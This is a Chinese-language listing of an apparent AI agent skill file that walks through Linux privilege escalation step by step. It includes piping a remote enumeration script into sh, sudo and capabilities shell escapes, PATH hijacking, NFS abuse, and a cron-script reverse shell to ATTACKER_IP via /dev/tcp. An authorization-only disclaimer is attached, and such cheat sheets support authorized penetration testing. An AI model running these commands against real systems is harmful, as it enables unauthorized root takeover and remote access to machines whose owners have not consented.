【计算机工具类-操作系统Skills】linux-privilege-escalation 技能
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.
技能概述
linux-privilege-escalation 技能在Linux系统上执行系统化权限提升评估,识别和利用错误配置、易受攻击的服务和安全弱点,从而实现从低权限用户访问到root级别控制的提升。
下载地址:https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation
授权使用声明:此技能仅用于授权的安全评估、防御性验证或受控的教育环境。
输入/前置条件
- 目标Linux系统的低权限shell访问
- 执行命令的能力(交互式或半交互式shell)
- 反向shell连接的网络访问(如需要)
- 攻击者机器用于托管payload和接收shell
输出/交付物
- 目标系统上的root shell访问
- 权限提升路径文档
- 系统枚举发现报告
- 修复建议
核心工作流程
阶段1: 系统枚举
# 主机名和系统角色
hostname# 内核版本和架构
uname -a# 详细内核信息
cat /proc/version# 操作系统详情
cat /etc/issue
cat /etc/*-release
阶段2: 自动化枚举
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh# LinEnum
./LinEnum.sh -t# Linux Smart Enumeration
./lse.sh -l 1# Linux Exploit Suggester
./les.sh
阶段3: 内核漏洞利用
识别内核版本并搜索漏洞:
uname -r
cat /proc/version# 使用Linux Exploit Suggester
./linux-exploit-suggester.sh# 手动搜索
searchsploit linux kernel [version]
阶段4: Sudo利用
# 枚举sudo权限
sudo -l# GTFOBins sudo利用示例
sudo vim -c ':!/bin/bash'
sudo find . -exec /bin/sh \; -quit
sudo awk 'BEGIN {system("/bin/bash")}'
阶段5: SUID二进制文件利用
# 查找SUID二进制文件
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null# 利用SUID二进制文件(参考GTFOBins)
阶段6: Capabilities利用
# 枚举capabilities
getcap -r / 2>/dev/null# 利用示例
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
阶段7: Cron作业利用
# 枚举cron作业
cat /etc/crontab
ls -la /var/spool/cron/crontabs/
ls -la /etc/cron.*# 利用可写cron脚本
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
阶段8: PATH劫持
# 查找调用外部命令的SUID二进制文件
strings /usr/local/bin/suid-binary# 通过在可写PATH中创建恶意二进制文件进行劫持
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
阶段9: NFS利用
# 查找no_root_squash选项
cat /etc/exports# 挂载共享并创建SUID二进制文件
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
快速参考
- 内核版本:
uname -a - 当前用户:
id - Sudo权限:
sudo -l - SUID文件:
find / -perm -u=s -type f 2>/dev/null - Capabilities:
getcap -r / 2>/dev/null - Cron作业:
cat /etc/crontab - 可写目录:
find / -writable -type d 2>/dev/null - NFS导出:
cat /etc/exports
关键资源
- GTFOBins: GTFOBins
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
约束和限制
- 在生产环境使用前,在测试环境中验证内核漏洞
- 失败的内核漏洞可能导致系统崩溃
- 记录权限提升期间的所有更改
- 仅在授权时维护访问持久性
局限性
- 仅在任务明确匹配上述范围时使用此技能
- 不要将输出视为环境特定验证、测试或专家审查的替代品
- 如果缺少必需的输入、权限、安全边界或成功标准,请停止并请求澄清
